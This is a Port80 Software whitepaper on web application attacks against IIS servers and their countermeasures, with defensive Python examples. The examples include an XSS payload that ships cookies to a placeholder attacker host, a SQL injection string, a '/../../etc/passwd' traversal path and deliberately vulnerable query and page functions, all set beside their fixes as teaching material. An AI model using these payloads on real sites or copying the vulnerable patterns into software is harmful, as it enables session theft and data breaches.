Why you need a Web App Firewall (and more)

A Review of Web Application Attacks & Countermeasures



There are so many types of Web-based attacks and security risks to watch out for, where do you start?

While the details of these attacks vary greatly, the key threat concepts -- and the main defensive countermeasures -- are well understood and can be boiled down to a manageable list.

Let's take a look at the major attack types that your Microsoft IIS Web servers, database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide countermeasures to these types of attacks.

Network and System Reconnaissance

Camouflage should be "standard issue" for Web servers. 

The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.


The most successful attacks are often targeted attacks, so removing or obfuscating the signatures of your technology platforms -- both obvious ones like the Server header, file extensions in URLs, or the TCP/IP window size, and more subtle ones like cookie names, ETag formats, HTTP header order, or the services running on particular IP/port combinations -- is an important countermeasure in itself.


This can either dissuade intruders from attacking your Web site or Web application altogether, or lead them to make incorrect assumptions that send them down the wrong path (for instance, trying a Linux/UNIX exploit against a Windows system).

Those mismatched attempts are also easier for firewalls and IDS systems to identify and block. Keep in mind that masking raises the attacker's cost but does not remove the underlying vulnerabilities, so it complements patching rather than replacing it.

Port80 Solutions: ServerMask
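To make the signals above concrete, here is an added example in Python (not Port80 code, and not how ServerMask is implemented) that scores a response for the platform tells listed above and produces a masked copy. The sample headers are constructed to look like an unhardened IIS/ASP.NET host; the replacement banner, the new cookie name and the choice to hash the ETag are assumptions made for this example.

```python
import hashlib
import re
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]

# Constructed sample: what an unhardened IIS/ASP.NET host typically sends back
# (names and values are representative, not captured from any real host).
SAMPLE_RESPONSE_HEADERS: Headers = [
    ("Server", "Microsoft-IIS/6.0"),
    ("X-Powered-By", "ASP.NET"),
    ("X-AspNet-Version", "2.0.50727"),
    ("Set-Cookie", "ASP.NET_SessionId=abc123; path=/"),
    ("ETag", '"0f3e1c2b9a4c81:7b2"'),   # IIS-style hex:hex ETag
    ("Content-Type", "text/html"),
]

# Signals a scanner keys on: header name -> (regex over the value, what it reveals).
SIGNALS = {
    "Server": (r"IIS|Apache|nginx", "server software and version"),
    "X-Powered-By": (r".", "application framework"),
    "X-AspNet-Version": (r".", "exact framework version"),
    "Set-Cookie": (r"ASP\.NET_SessionId|PHPSESSID|JSESSIONID", "framework default session cookie name"),
    "ETag": (r'^"[0-9a-f]+:[0-9a-f]+"$', "IIS-format ETag"),
}


def fingerprint(headers: Headers) -> Dict[str, str]:
    """Return {header: what it reveals} for every header that leaks a platform signal."""
    found = {}
    for name, value in headers:
        rule = SIGNALS.get(name)
        if rule and re.search(rule[0], value):
            found[name] = rule[1]
    return found


STRIP = {"X-Powered-By", "X-AspNet-Version"}   # pure information leaks: drop them
COOKIE_RENAMES = {"ASP.NET_SessionId": "sid"}   # assumed new name: keep the cookie, lose the telltale


def mask_headers(headers: Headers, server_banner: str = "Web Server") -> Headers:
    """Neutralize the signals and leave everything else untouched and in order."""
    out = []
    for name, value in headers:
        if name in STRIP:
            continue
        if name == "Server":
            value = server_banner
        elif name == "Set-Cookie":
            for old, new in COOKIE_RENAMES.items():
                value = value.replace(old + "=", new + "=", 1)
        elif name == "ETag":
            # Keep cache validation working (same input -> same output) while hiding
            # the platform-specific format behind an opaque hash.
            value = '"' + hashlib.sha256(value.encode()).hexdigest()[:16] + '"'
        out.append((name, value))
    return out
```

Header order, also named above, is left untouched here; a real mask would reorder as well. On IIS the Server header is generated by the server itself rather than by page code, which is one reason this kind of masking is normally done in a server module rather than in the application.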

Image and File Leeching

Do not serve Web content for others unknowingly. 

A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching attack, where a hacker identifies file resources that are not access controlled or protected by authentication on your Web site, like images and video.


The leecher links to the file resource on your site from within their own Web page, so that their visitors fetch your content directly (which you served and paid the bandwidth for). Those visitors will not know that it is actually your content they are viewing.

The solution is to make sure that Web requests for file resources on a site or application come from a Web user who is on your site, not from another site that has deep linked to your file resources.


The countermeasures to stop this type of leeching range from the simple to the more robust, from Referer checking through time-limited or "sessionized" URLs. Referer checking is cheap but coarse: the header can be spoofed by a script, and many legitimate browsers send no Referer at all, so a strict check must decide what to do with empty values. Signed, expiring URLs do not depend on what the client volunteers.

You can also weed out the more amateurish leeching bots and scripts by checking the cookie, browser, and HTTP header details of each request.

Port80 Solutions: LinkDeny
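An added example in Python (not LinkDeny's code) of the two checks just described: a Referer allowlist and an HMAC-signed expiring URL. SECRET, the allowed host names and the URL layout (exp and sig query parameters) are assumptions made for this example.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlencode, urlparse

SECRET = b"rotate-me-out-of-band"                    # assumed server-side key, never sent to clients
ALLOWED_HOSTS = {"www.example.com", "example.com"}   # assumed: hosts allowed to embed our files


def referer_allowed(referer: str, allow_empty: bool = True) -> bool:
    """Cheapest check: is the Referer one of our own hosts? Empty referers are common
    (privacy settings, direct hits, bookmarks), so blocking them breaks real users."""
    if not referer:
        return allow_empty
    host = urlparse(referer).hostname or ""
    return host.lower() in ALLOWED_HOSTS


def sign_url(path: str, ttl_seconds: int, now: float = None) -> str:
    """Append an expiry and a MAC over path+expiry; the link stops working after ttl."""
    expires = int(now if now is not None else time.time()) + ttl_seconds
    msg = f"{path}|{expires}".encode()
    sig = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{path}?{urlencode({'exp': expires, 'sig': sig})}"


def verify_url(url: str, now: float = None) -> bool:
    """Recompute the MAC from the requested path and expiry; reject tampered or stale links."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    try:
        expires = int(q["exp"][0])
        sig = q["sig"][0]
    except (KeyError, ValueError):
        return False
    if (now if now is not None else time.time()) > expires:
        return False
    msg = f"{parsed.path}|{expires}".encode()
    expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)   # constant-time comparison
```

The page that embeds the file generates the signed link at render time, so a copied link dies with its expiry and a link edited to point at a different file fails the MAC.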

Restricting Access

Block IPs that are no good (up to no good or not good for you). 

You can also protect against undesired use of your Web content by using IP access control to that content. This is often overlooked in sites that use authentication and authorization, but what if you need to host content for anonymous users as well -- or exclusively?


You may still be able to limit your audience, and hence your exposure to malicious requests.

If, for instance, your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the Web content and endlessly probe how it is served, costing you bandwidth in the meantime? Bear in mind that geolocation by IP is approximate and that attackers can route through proxies in the countries you allow, so treat country blocking as noise reduction rather than a security boundary.

And if unwanted traffic persists from a particular Web site or IP range, why continue to treat that traffic as if it were legitimate?


Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse.

Port80 Solutions: LinkDeny

SQL Injection Attacks

If it is going in the database, clean it up first. 

SQL injection attacks use the application's own database code to read, alter or destroy database content.

This is accomplished via a Web request in which user input is not correctly handled before being embedded in a SQL statement: string literal delimiters and comment sequences (like ' or --) are not escaped, or more generally the input is not strongly typed or validated, so part of it is unexpectedly interpreted and executed as SQL.


You can code to avoid this type of attack in your Web application (parameterized queries, which send the value separately from the statement text, are the standard fix), but many Web developers do not have the time or the expertise to cover the types of input validation required to make sure that:

1. characters passed in request parameters (query strings, form fields, cookies, headers) do not allow for unintended database access and control, and

2. the type of data being passed is what was intended (for example, checking that user-supplied input destined for a numeric field in a SQL statement is indeed numeric).


You can also make the database itself more secure with measures such as stored procedures (which only help if the procedure does not build dynamic SQL from its arguments) and least-privilege accounts for the application's database connection, so that a successful injection cannot drop tables or reach beyond the data the application legitimately needs.

Still, you need to validate the inputs allowed to reach the database to avoid parser evasion attacks that try to sneak various characters into a string, allowing an attacker to append commands to a normal variable value to delete or alter database content (or escalate their privileges on your application or server itself).

Port80 Solutions: ServerDefender AI, ServerDefender VP
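The flaw and its fix as an added example in Python against the standard sqlite3 module (not Port80 code). The users table and its rows are constructed for the example; the injected string shows how a single quote turns a name lookup into a search for the admin account.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an application's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", 1), (2, "bob", 0), (3, "carol", 0)])
    return db


def find_by_name_vulnerable(db: sqlite3.Connection, name: str) -> List[Tuple[str, int]]:
    """The value is pasted into the statement, so a quote ends the literal and the
    rest of the input is parsed as SQL ("--" comments out the trailing quote)."""
    sql = f"SELECT name, is_admin FROM users WHERE name = '{name}'"
    return db.execute(sql).fetchall()


def find_by_name_safe(db: sqlite3.Connection, name: str) -> List[Tuple[str, int]]:
    """Parameterized: the driver sends the value separately; it is never parsed as SQL."""
    return db.execute("SELECT name, is_admin FROM users WHERE name = ?", (name,)).fetchall()


def find_by_id_safe(db: sqlite3.Connection, raw_id: str) -> List[Tuple[str, int]]:
    """Point 2 from the text: enforce the expected type before the value gets near SQL,
    then still bind it as a parameter."""
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return db.execute("SELECT name, is_admin FROM users WHERE id = ?", (int(raw_id),)).fetchall()
```

With the constructed data, `find_by_name_vulnerable(db, "nobody' OR is_admin=1 --")` returns the admin row, while the parameterized version returns nothing because the whole string is compared as a name.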

Buffer Overflow Attacks

Put some limits on data requested from unknown Web users. 

Attackers love to throw huge amounts of malicious data at systems to see what limits have been set and to see if too much data crammed in a particular form field or URL string will crash the system -- or lead to remote control of your servers.


They will pack shellcode (a transferable piece of code used as the payload in the exploitation of a software bug), often full of high-bit or non-printable bytes, into a Web request, hoping that the developer has not placed any size limits on the request and is not validating input into the Web application.

Placing a limit on the length of each request component (URL, headers, query string, form fields, body) removes the easy cases. It does not fix the overflow itself, which lives in native code you may not control (a server extension, a parser, a library), so treat the limit as a way to keep oversized payloads away from that code until it is patched.

Port80 Solutions: ServerDefender AI, ServerDefender VP

Cross-Site Scripting (XSS) Attacks

Don't become a vector for attacks on other sites or your Web visitors themselves. 

Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side script into Web pages viewed by other users. Because the injected script is served from your site, the browser runs it with your site's origin, so the same origin policy that normally keeps one site's script away from another site's data offers no protection.


By these means, an attacker can gain access to sensitive page content, session cookies, and a variety of other client-side objects.

XSS comes in three forms. Reflected (non-persistent) XSS is the most common: data provided by a Web user is used immediately by server-side code to generate a page of results for that user, and if the unvalidated user-supplied data is included in the resulting page without HTML encoding, client-side code is injected into the dynamic page. Stored (persistent) XSS is the same flaw applied to data saved on the server, such as a comment or profile field, which then hits every user who views it. DOM-based XSS lives in the page's own client-side script, which writes untrusted data (for example, part of the URL) into the document without encoding; the server may never see the payload, so only a client-side fix helps.


If an attacker can convince a user to follow a malicious URL that injects code into the results page, the attacker gets full control of that page as rendered in the victim's session, where many other traps can be laid for the user, like false search engine or database search results displaying hacker-designed and -controlled URLs.


Port80 Solutions: ServerDefender AI, ServerDefender VP
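The reflected search-results page described above, as an added example in Python (not Port80 code): once built with raw string concatenation and once with encoding appropriate to each output context. The page markup and the payload string are constructed for this example; DOM-based XSS needs the same discipline inside the page's own script, which this server-side example does not cover.

```python
import html
from urllib.parse import quote

# Constructed payload: closes the attribute it lands in, then runs script that ships the
# victim's cookie to a host the attacker controls (attacker.test is a placeholder name).
PAYLOAD = '"><script>document.location="http://attacker.test/?c="+document.cookie</script>'


def results_page_vulnerable(query: str) -> str:
    """The search term is echoed straight into the body and into an attribute value."""
    return (f"<h1>Results for {query}</h1>"
            f'<input name="q" value="{query}">')


def results_page_safe(query: str) -> str:
    """Same page; everywhere the term is emitted it is HTML-encoded for that context."""
    text = html.escape(query, quote=True)   # & < > " ' become entities: safe in body text and quoted attributes
    return (f"<h1>Results for {text}</h1>"
            f'<input name="q" value="{text}">')


def next_page_link_safe(query: str) -> str:
    """A third context: the term goes into a URL query component, so percent-encode it
    first, then HTML-encode the attribute the URL sits in."""
    return f'<a href="/search?q={html.escape(quote(query, safe=""))}">next</a>'


def contains_script_tag(markup: str) -> bool:
    """Crude detector used only to show the difference between the two renderings."""
    return "<script" in markup.lower()
```

The encoding function has to match the output context: body text and quoted attributes take entity encoding, a URL component takes percent-encoding first, and data placed inside a script block needs a JavaScript-specific encoder rather than either of these.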

Cross-Site Request Forgery Attacks

Seriously, don't become a vector for indirect attacks on other sites or your visitors. 

Cross-site request forgery (CSRF or XSRF), also known as a one-click attack or session riding, is often grouped with XSS but works the other way around: rather than injecting unauthorized code into a Web site, a cross-site request forgery attack makes a user's browser transmit unauthorized commands to a Web site or application that considers that user to be authenticated.


At risk are Web sites and applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. Any endpoint whose only proof of intent is a cookie (or HTTP authentication) that the browser attaches automatically qualifies, whether it is reached by a plain form post or by an Ajax (XMLHttpRequest) call; an Ajax endpoint that insists on a custom request header is actually harder to forge, because a page on another origin cannot add that header without the server's explicit permission.

A user that is authenticated by a cookie saved in his Web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action (for instance, withdrawing funds from a bank account).


These types of attacks are very common on Internet forums, where users are allowed to post images but not JavaScript: an image tag pointing at a state-changing URL on another site makes every reader's browser fetch it, cookies attached. The first lesson is therefore never to change state on a GET request.

To combat this, URLs can be sessionized by implementing a transient authentication mechanism (such as a constantly-changing, hidden form field value, bound to the user's session and checked on every state-changing request) rather than relying on persistent, cookie-based, or HTTP authentication alone.

A simpler approach, requiring far less code rewriting, is to check that the Referer in the request is from an authorized, on-site page. This can be spoofed, however, and is often absent, and so should not be relied upon exclusively.


For Ajax scenarios in particular, a modestly costly method for combating CSRF attacks is the double-submit pattern: a token is set in a cookie, page script reads it and submits it separately with the GET or POST (typically in a request header), and the server checks that the two copies match. The token should be a separate random value rather than the authentication cookie itself, and the pattern assumes that no attacker can set cookies for your domain (for example from a sibling subdomain).

Cookie encryption or signing does not, on its own, stop CSRF: the browser sends the cookie regardless of who made the request. What does help, alongside tokens, is the SameSite cookie attribute, which tells modern browsers not to attach the cookie to cross-site requests.

Port80 Solutions: ServerDefender AI, ServerDefender VP, LinkDeny (weak protection)
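The two token schemes above as an added example in Python (not Port80 code): a session-bound synchronizer token for forms and the double-submit variant for Ajax, applied to a state-changing endpoint. SECRET, the cookie and header names, and the plain dict standing in for the framework's request object are assumptions made for this example.

```python
import hashlib
import hmac
import secrets

SECRET = b"server-only-key"   # assumed: stays server-side and is rotated out of band


def csrf_token(session_id: str) -> str:
    """Synchronizer token derived from the session id: the server can recompute it
    instead of storing one per form, and a token lifted from another session won't match."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def valid_synchronizer(session_id: str, submitted) -> bool:
    """Compare in constant time; a missing or empty token fails."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id).encode(), str(submitted).encode())


def new_double_submit_token() -> str:
    """Random value to set in a 'csrf' cookie at login for the Ajax variant
    (a separate token, deliberately not the session cookie)."""
    return secrets.token_hex(32)


def valid_double_submit(cookies: dict, headers: dict) -> bool:
    """Ajax variant: page script copies the cookie into a request header. A page on another
    origin cannot read our cookies, so it cannot supply the matching header."""
    c, h = cookies.get("csrf"), headers.get("X-CSRF-Token")
    if not c or not h:
        return False
    return hmac.compare_digest(c.encode(), h.encode())


def handle_transfer(request: dict) -> int:
    """A state-changing endpoint. Returns the HTTP status it would send."""
    if request["method"] != "POST":           # never change state on GET (an <img src> is a GET)
        return 405
    sid = request["cookies"].get("session")   # the browser attaches this automatically...
    if not sid:
        return 401
    if not valid_synchronizer(sid, request["form"].get("csrf")):   # ...so demand proof the form came from us
        return 403
    return 200
```

The forged request in the test carries the victim's session cookie, exactly as a browser would send it from an attacker's page, and is still refused because the hidden field the attacker cannot read is missing.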

Directory Traversal Attacks

/admin, /scripts, /noaccess, /etc. 

If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site.

Also known as ../ (dot dot slash), directory climbing, backtracking, and sometimes a canonicalization attack, a directory traversal attack exploits insufficient security validation and sanitization of user-supplied URL paths in Web site and application requests.


Two distinct problems hide behind this tagline. Forced browsing, reaching /admin or a stray backup file simply because nothing but obscurity protects it, is not a coding flaw but a lack of access control for every resource on the site. Directory traversal proper is a validation flaw: the application builds a file path from request data without canonicalizing it and checking that the result stays inside the intended directory.

Microsoft Windows or DOS directory traversal uses the ..\ characters, although many Windows programs or APIs also accept UNIX-like directory traversal characters (../), but at least most directory traversal on Windows is limited to a single partition (C:\, etc.), since ..\ cannot cross from one drive letter to another.


Though IIS can handle simple cases of directory traversal attacks, this is just a start.

You need to stop requests to seemingly non-existent Web resources, sanitize inputs from all odd or non-standard character encodings, ensure document roots are known and string lengths are consistent, and also confirm that no files outside the document root of the site can be served.

Of course, the best response to a directory traversal request (the only one that does not give any clues to the attacker) is a good old 404 HTTP response.

Port80 Solutions: ServerDefender AI, ServerDefender VP.
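An added example in Python (not Port80 code, and not IIS's own path handling) of the checks listed above: decode until the path stops changing, reject control bytes, treat backslash as a separator, canonicalize, and confirm the result is under the document root, answering anything else with a 404. The document root and the request paths are constructed for the example; nothing is read from disk.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/site"   # assumed document root for the example


def resolve_under_root(request_path: str, docroot: str = DOCROOT):
    """Return the canonical file path, or None (serve a 404) if the request escapes docroot."""
    # 1. Decode repeatedly until stable: catches %2e%2e%2f and double-encoded %252e%252e.
    path = request_path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if unquote(path) != path:          # still changing after three rounds: refuse the oddity
        return None
    # 2. Reject NUL and other control bytes, which truncate or confuse file names in some runtimes.
    if any(ord(c) < 0x20 for c in path):
        return None
    # 3. Treat backslash as a separator, as Windows APIs do, so ..\ is not a plain file name.
    path = path.replace("\\", "/")
    # 4. Join to the root as a relative path and collapse ./ and ../ segments.
    full = posixpath.normpath(posixpath.join(docroot, path.lstrip("/")))
    # 5. Containment check on the canonical result, not on the raw request.
    if full != docroot and not full.startswith(docroot + "/"):
        return None
    return full
```

The containment test is done after normalization, so "/images/../index.html" is accepted (it stays inside the root) while "/../../etc/passwd" and its encoded and backslash variants all come back as None. Overlong UTF-8 sequences decode to replacement characters here and simply fail to match a real file, which still ends in a 404.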

Zero Day Attacks

Protect against attacks before the patch and after the patch. 

A zero-day (or zero-hour) attack is not so much a specific type of attack as it is a special case of all other types. A zero-day attack is one that exploits a previously undisclosed or unpatched application vulnerability.


Zero-day attacks take advantage of Web security holes for which no vendor fix is yet available.

0-day exploits circulate before or on the same day that the vulnerability is publicly disclosed, sometimes even on the day the vendor patch is released, when most systems are still unpatched.

The term refers to the number of days the vendor (and therefore the defender) has had to respond: zero. A vulnerability that is actively exploited while no patch exists is the zero-day case; once the patch ships, the exposure continues on every system that has not yet applied it.


As new attacks against IIS and application server code appear, most of which fall into one of the other categories discussed here, it is valuable to have a general-purpose Web application firewall covering those categories, so that the site or app is protected from the attack vector before the platform patches can be applied. Generic rules catch the common shapes of an attack (traversal sequences, injection syntax, oversized inputs); they are a bridge to patching, not a reason to skip it.

Port80 Solutions: ServerDefender AI, ServerDefender VP.

Brute Force Attacks

A, B, C, D, Admin Access... 

A brute force attack is a method of defeating an authentication or authorization scheme by trying a large number of possible answers. Working exhaustively through every possible password or key is brute force in the strict sense; a dictionary attack is the cheaper variant that tries likely candidates (common passwords, words, leaked credentials) first.


The same technique is also used to discover hidden or unprotected directories and files by guessing their names, and to break authentication and authorization layers.

Effective request throttling, tracking and limiting the frequency of Web requests per second to a particular login page or directory, often defeats this form of automated attack. Two caveats: throttling by IP address alone does not stop an attacker who spreads guesses across many addresses or slows down to stay under the limit, and locking accounts after a fixed number of failures hands an attacker an easy way to lock out legitimate users, so temporary, per-source throttling is usually preferable to hard lockouts.

Port80 Solutions: ServerDefender AI

Denial-of-Service Attack

Too much traffic can be deadly for any Web site. 

A denial-of-service attack (DoS) is an attempt to make a Web server resource unavailable to its intended users.

Although there are many ways to accomplish such an attack, it generally comprises the concerted, malevolent efforts of hackers to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding the site or app with an unusually high amount of Web requests, including requests that tie up resources by inducing error states.


This, in turn, forces the targeted Web server to reset or consume its resources such that it can no longer serve legitimate requests.

Like a brute force attack, being able to identify and block IP addresses with a high frequency of requests can stop these attacks before site resources are used up, keeping legitimate Web users in service. Per-address limits are effective against a single noisy source; a distributed attack (DDoS) from thousands of addresses, or a flood that saturates the network link itself, has to be absorbed upstream of the Web server.
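One added example in Python (not ServerDefender's code) serves both the login throttle from the brute force section and the per-address flood limit above: a sliding-window limiter with a temporary ban, replayed over a constructed request stream. The limits, the ban duration and the sample traffic (addresses from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24) are assumptions made for the example.

```python
from collections import defaultdict, deque


class Throttle:
    """Sliding-window limiter: more than `limit` hits on a key within `window` seconds
    blocks the key for `ban` seconds. Use (client_ip, path) as the key for a login
    throttle, or client_ip alone for a flood limit on the whole site."""

    def __init__(self, limit: int, window: float, ban: float):
        self.limit, self.window, self.ban = limit, window, ban
        self.hits = defaultdict(deque)   # key -> timestamps still inside the window
        self.banned_until = {}

    def allow(self, key, now: float) -> bool:
        if self.banned_until.get(key, 0) > now:
            return False
        q = self.hits[key]
        while q and q[0] <= now - self.window:
            q.popleft()                  # forget hits that fell out of the window
        q.append(now)
        if len(q) > self.limit:
            self.banned_until[key] = now + self.ban   # a ban, not merely a slowdown
            q.clear()
            return False
        return True


# Constructed traffic: one client hammering the login page, one normal user.
SAMPLE_REQUESTS = (
    [(i * 0.5, "203.0.113.7", "/login.aspx") for i in range(20)]   # 20 attempts in 10 s
    + [(1.0, "198.51.100.10", "/login.aspx"),
       (2.0, "198.51.100.10", "/login.aspx"),
       (45.0, "198.51.100.10", "/account.aspx")]
)


def replay(requests, limit: int = 5, window: float = 60, ban: float = 300):
    """Run a (time, ip, path) stream through a login throttle keyed on (ip, path).
    Returns {ip: (served, rejected)}."""
    t = Throttle(limit, window, ban)
    counts = defaultdict(lambda: [0, 0])
    for now, ip, path in sorted(requests):
        idx = 0 if t.allow((ip, path), now) else 1
        counts[ip][idx] += 1
    return {ip: tuple(v) for ip, v in counts.items()}
```

For the flood case, key the same Throttle on the client address alone with a much higher limit; the structure is identical, only the key and the numbers change. Behind a proxy or NAT the address you see is the proxy's, so in that deployment the key has to come from the forwarded-client header the proxy sets, and only from a proxy you trust.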

Privilege Escalation Attacks

Control is the ultimate goal of all attackers. 

At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources which normally would have been protected from an application or user with lower privileges.


The result is that the Web application performs actions in a higher security context than intended, one reserved for Web developers or system administrators.

Buffer overflows, XSS, and CSRF can all serve as the first step of such an escalation. Most hacks focus on getting administrative privileges on the target Web server and can involve unauthorized access through vulnerable server components (historically on IIS, the .printer ISAPI extension and Remote Data Services), up to running the command line with administrator privileges or the application's own privileges.

At that point, your Web server is now the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead.

Port80 Solutions: ServerDefender AI, ServerDefender VP.

Defense-in-Depth Works

How do you avoid being fully hacked?

In general, it goes without saying that you should protect your ports and network with a standard network firewall, keep patching your OS, Web, app, and DB layers, require authentication for restricted sections of the site, and learn as much as possible about the security features available in whatever you develop in, whether ASP, ASP.NET, ColdFusion, PHP, JSP, or another Web platform.


By additionally layering in Port80 Software's security solutions, you will augment these systems to directly protect your Microsoft IIS Web server, Web apps, and data from the bad guys out there on the Internet.

About Port80 Software

Solutions for Microsoft IIS Web Servers

Port80 software exposes control to server-side functionality for developers, and streamlines tasks for administrators:

• Increase security by locking down what info you broadcast and blocking intruders with ServerMask and ServerDefender

• Protect your intellectual property by preventing hotlinking with LinkDeny

• Improve performance: compress pages and manage cache controls for faster load time and bandwidth savings with CacheRight, httpZip, and ZipEnable

• Upgrade Web development tools: Negotiate content based on device, language, or other parameters with PageXchanger, and tighten code with w3compiler.

Visit us online @ www.port80software.com